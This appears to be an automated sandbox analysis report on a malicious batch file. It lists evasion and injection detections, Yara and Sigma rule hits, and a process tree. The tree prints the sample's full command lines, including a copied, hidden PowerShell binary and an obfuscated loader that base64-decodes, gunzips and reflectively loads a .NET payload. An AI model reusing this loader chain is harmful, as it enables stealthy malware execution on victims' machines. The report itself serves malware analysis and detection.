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Analysis Report
General Information
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Found large BAT file
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
- System is w10x64
- cmd.exe (PID: 5692 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\INQ24 -012207003 0786451.ba t" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3596 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chcp.com (PID: 5704 cmdline:
chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32) - cmd.exe (PID: 736 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho F " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - xcopy.exe (PID: 6348 cmdline:
xcopy /d / q /y /h /i C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe C :\Users\us er\Desktop \INQ24-012 2070030786 451.bat.Iz u MD5: 39FBFD3AF58238C6F9D4D408C9251FF5) - attrib.exe (PID: 3712 cmdline:
attrib +s +h C:\User s\user\Des ktop\INQ24 -012207003 0786451.ba t.Izu MD5: 5037D8E6670EF1D89FB6AD435F12A9FD) - INQ24-0122070030786451.bat.Izu (PID: 6600 cmdline:
C:\Users\u ser\Deskto p\INQ24-01 2207003078 6451.bat.I zu -Window Style hidd en -comman d "$Hohcwa tlus = get -content ' C:\Users\u ser\Deskto p\INQ24-01 2207003078 6451.bat' | Select-O bject -Las t 1; $Qlho h = [Syste m.Convert] ::FromBase 64String($ Hohcwatlus );$Mvwalay toyd = New -Object Sy stem.IO.Me moryStream ( , $Qlhoh );$Myhbvc ux = New-O bject Syst em.IO.Memo ryStream;$ Uvlejdiywl p = New-Ob ject Syste m.IO.Compr ession.Gzi pStream $M vwalaytoyd , ([IO.Com pression.C ompression Mode]::Dec ompress);$ Uvlejdiywl p.CopyTo( $Myhbvcux );$Uvlejdi ywlp.Close ();$Mvwala ytoyd.Clos e();[byte[ ]] $Qlhoh = $Myhbvcu x.ToArray( );[Array]: :Reverse($ Qlhoh); $R byymtwxmx = [System. AppDomain] ::CurrentD omain.Load ($Qlhoh); $Qokucu = $Rbyymtwxm x.EntryPoi nt; $Qokuc u.Declarin gType.Invo keMember($ Qokucu.Nam e, [System .Reflectio n.BindingF lags]::Inv okeMethod, $null, $n ull, $null )| Out-Nul l" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
Click to see the 2 entries |
Source | Rule | Description | Author | Strings |
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
System Summary |
Source: | Author: Florian Roth (Nextron Systems): |